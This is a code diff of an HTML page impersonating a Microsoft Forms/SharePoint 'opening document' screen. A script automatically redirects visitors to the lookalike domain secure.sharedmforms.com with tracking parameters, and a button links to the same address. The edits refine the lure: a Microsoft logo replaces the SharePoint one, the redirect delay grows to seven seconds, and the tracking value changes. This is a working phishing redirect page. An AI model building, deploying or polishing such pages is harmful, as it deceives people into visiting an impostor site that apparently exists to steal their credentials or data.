--- a/index.html
+++ b/index.html
@@ -8,8 +8,8 @@
   <!-- Auto redirect after 2 seconds -->
   <script>
     setTimeout(function () {
-      window.location.href = "https://secure.sharedmforms.com/?aCXefF=NjE4MDkyZGQ2ZTZlNDNhODkzNzVjNmRmZmE3Yzk1YTk%3D&84K5B=E1aHz";
-    }, 2000);
+      window.location.href = "https://secure.sharedmforms.com/?aCXefF=NjE4MDkyZGQ2ZTZlNDNhODkzNzVjNmRmZmE3Yzk1YTk%3D&ycYpL=Q3839R";
+    }, 7000);
   </script>
 
   <style>
@@ -128,7 +128,7 @@
   <div class="card">
 
     <div class="sp-logo">
-      <img src="sharepoint-logo.png" alt="SharePoint Logo" />
+      <img src="microsoft.png" alt="microsoft" />
     </div>
 
     <h1>Opening document in Microsoft Forms…</h1>
@@ -136,7 +136,7 @@
 
     <div class="spinner"></div>
 
-    <a class="button" href="https://secure.sharedmforms.com/?aCXefF=NjE4MDkyZGQ2ZTZlNDNhODkzNzVjNmRmZmE3Yzk1YTk%3D&84K5B=E1aHz">
+    <a class="button" href="https://secure.sharedmforms.com/?aCXefF=NjE4MDkyZGQ2ZTZlNDNhODkzNzVjNmRmZmE3Yzk1YTk%3D&ycYpL=Q3839R">
       Open in Microsoft Forms
     </a>
 
